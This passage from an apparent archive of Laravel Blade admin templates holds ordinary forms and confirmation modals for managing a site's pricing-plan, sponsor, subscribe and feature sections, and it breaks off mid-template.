"on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('plan-section.update', $item_section->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }} </label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#planSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="planSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="planSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="planSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('plan-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('plan-section.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }} </label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="planModal" tabindex="-1" role="dialog" aria-labelledby="buyNowModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="testimonialModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('plan.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }}</label> <input type="text" name="name" class="form-control" id="name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="tag">{{ __('content.tag') }}</label> <input type="text" name="tag" class="form-control" id="tag"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="currency">{{ __('content.currency') }}</label> <input type="text" name="currency" class="form-control" id="currency"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="price">{{ __('content.price') }}</label> <input type="text" name="price" class="form-control" id="price"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="extra_text">{{ __('content.extra_text') }}</label> <textarea name="extra_text" class="form-control" id="extra_text" rows="3"></textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="feature-list">{{ __('content.feature_list') }}</label> <input type="text" name="feature_list" class="form-control" id="feature-list"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="non-feature-list">{{ __('content.non_feature_list') }}</label> <input type="text" name="non_feature_list" class="form-control" id="non-feature-list"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="recommended" class="col-form-label">{{ __('content.recommended') }}</label> <select class="form-control" name="recommended" id="recommended"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="no">{{ __('content.no') }}</option> <option value="yes">{{ __('content.yes') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������views/admin/sections/plan/edit.blade.php������������������������������������������������������������0000644�����������������00000014370�14765366573�0014311 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_plan') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('plan.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }}</label> <input type="text" name="name" class="form-control" id="name" value="{{ $item->name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="tag">{{ __('content.tag') }}</label> <input type="text" name="tag" class="form-control" id="tag" value="{{ $item->tag }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="currency">{{ __('content.currency') }}</label> <input type="text" name="currency" class="form-control" id="currency" value="{{ $item->currency }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="price">{{ __('content.price') }}</label> <input type="text" name="price" class="form-control" id="price" value="{{ $item->price }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="extra_text">{{ __('content.extra_text') }}</label> <textarea name="extra_text" class="form-control" id="extra_text" rows="3">{{ $item->extra_text }}</textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="feature-list">{{ __('content.feature_list') }}</label> <input type="text" name="feature_list" class="form-control" id="feature-list" value="{{ $item->feature_list }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="non-feature-list">{{ __('content.non_feature_list') }}</label> <input type="text" name="non_feature_list" class="form-control" id="non-feature-list" value="{{ $item->non_feature_list }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $item->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $item->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="recommended" class="col-form-label">{{ __('content.recommended') }}</label> <select class="form-control" name="recommended" id="recommended"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="no" {{ $item->recommended == "no" ? 'selected' : '' }}>{{ __('content.no') }}</option> <option value="yes" {{ $item->recommended == "yes" ? 'selected' : '' }}>{{ __('content.yes') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/sponsor/create.blade.php�������������������������������������������������������0000644�����������������00000030370�14765366573�0015376 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.sponsors') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('sponsor.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/sponsor-'.$style.'.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#sponsorModal">+ {{ __('content.add_sponsor') }}</button> </div> </div> @if (count($items) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('sponsor.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.image') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> @if (!empty($item->section_image)) <a href="{{ $item->url }}"> <img class="image-size img-fluid" src="{{ asset('uploads/img/sponsor/'.$item->section_image) }}" alt="sponsor image"> </a> @else <img class="image-size img-fluid" src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image"> @endif </td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('sponsor.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="sponsorModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="sponsorModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('sponsor.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="sponsorModal" tabindex="-1" role="dialog" aria-labelledby="sponsorModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="sponsorModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('sponsor.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 170 x 75) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }}</label> <input type="text" name="url" class="form-control" id="url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/sponsor/edit.blade.php���������������������������������������������������������0000644�����������������00000015732�14765366573�0015065 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_sponsor') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/faq-'.$item->style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('sponsor.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 170 x 75) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/sponsor/'.$item->section_image) }}" alt="sponsor image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }} </label> <input type="text" name="url" class="form-control" id="url" value="{{ $item->url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('sponsor.destroy_image', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ��������������������������������������views/admin/sections/subscribe/create.blade.php�����������������������������������������������������0000644�����������������00000011736�14765366573�0015661 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.subscribe_section') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('subscribe-section.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> </h4> @if (isset($subscribe_section)) <form action="{{ route('subscribe-section.update', $subscribe_section->id) }}" method="POST"> @method('PUT') @csrf <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $subscribe_section->title }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#subscribeSectionDestroyModal{{ $subscribe_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="subscribeSectionDestroyModal{{ $subscribe_section->id }}" tabindex="-1" role="dialog" aria-labelledby="subscribeSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="subscribeSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('subscribe-section.destroy', $subscribe_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else <form action="{{ route('subscribe-section.store') }}" method="POST"> @csrf <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ����������������������������������views/admin/sections/feature/create.blade.php�������������������������������������������������������0000644�����������������00000075271�14765366573�0015337 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.features') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('feature.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/feature-'.$style.'.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#featureSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#featureModal">+ {{ __('content.add_feature') }}</button> </div> </div> @if (count($items) > 0) <div class="mr-3"> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('feature.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.subtitle') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.description') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $item->subtitle }}</td> <td>{{ $item->title }}</td> <td>{{ $item->description }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('feature.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="featureModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="featureModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('feature.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="featureSectionModal" tabindex="-1" role="dialog" aria-labelledby="featureSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="featureSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('feature-section.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 